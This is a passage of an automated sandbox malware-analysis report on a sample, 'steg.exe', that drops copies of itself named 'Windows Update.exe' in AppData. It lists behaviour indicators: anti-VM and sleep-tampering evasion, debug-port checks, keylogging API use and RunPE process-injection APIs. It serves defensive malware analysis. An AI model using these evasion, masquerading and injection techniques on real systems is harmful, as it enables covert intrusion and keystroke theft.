                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Yara detected AntiVM3
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5876, type: MEMORYSTR
                                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFunction Chain: threadCreated,threadResumed,threadDelayed,threadDelayed,threadInformationSet,threadCreated,threadInformationSet,threadResumed,memAlloc,memAlloc,threadDelayed,processSet,processSet,threadDelayed,windowEnumerated,messagePosted,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,networkSend,deviceIO
                                Source: C:\Users\user\Desktop\steg.exe TID: 6616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 3600Thread sleep time: -120000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5908Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5908Thread sleep time: -300000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5908Thread sleep time: -100000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 5164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 1728Thread sleep time: -120000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6884Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6884Thread sleep time: -100000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6884Thread sleep time: -100000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: GetAdaptersInfo,14_2_055217D6
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: GetAdaptersInfo,14_2_055217B4
                                Source: C:\Users\user\Desktop\steg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000Jump to behavior
                                Source: Windows Update.exe, 0000000E.00000002.357606780.00000000011EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/o
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_053A6358 LdrInitializeThunk,14_2_053A6358
                                Source: C:\Users\user\Desktop\steg.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                .NET source code references suspicious native API functions
                                Source: steg.exe, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: steg.exe, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: steg.exe, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: Windows Update.exe.0.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: Windows Update.exe.0.dr, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: Windows Update.exe.0.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 0.0.steg.exe.f80000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 0.0.steg.exe.f80000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 0.0.steg.exe.f80000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 0.2.steg.exe.f80000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 0.2.steg.exe.f80000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 0.2.steg.exe.f80000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: WindowsUpdate.exe.4.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: WindowsUpdate.exe.4.dr, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: WindowsUpdate.exe.4.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 4.0.Windows Update.exe.10000.9.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 4.0.Windows Update.exe.10000.9.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 4.0.Windows Update.exe.10000.9.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 4.0.Windows Update.exe.10000.6.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 4.0.Windows Update.exe.10000.6.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 4.0.Windows Update.exe.10000.6.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 4.0.Windows Update.exe.10000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 4.0.Windows Update.exe.10000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 4.0.Windows Update.exe.10000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 4.0.Windows Update.exe.10000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 4.0.Windows Update.exe.10000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 4.0.Windows Update.exe.10000.3.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 4.2.Windows Update.exe.10000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 4.2.Windows Update.exe.10000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 4.2.Windows Update.exe.10000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, RunPEx.csReference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
                                Source: C:\Users\user\Desktop\steg.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2708Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2676Jump to behavior
                                Source: Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [Program Manager - X1
                                Source: Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                Source: Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerP
                                Source: Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [Program Manager - 3/22/2022 4:04:32 AM]
                                Source: Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [Program Manager - 3/22/2022 4:04:32 AM
                                Source: Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [Program Manager
                                Source: Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qedProgram Manager
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
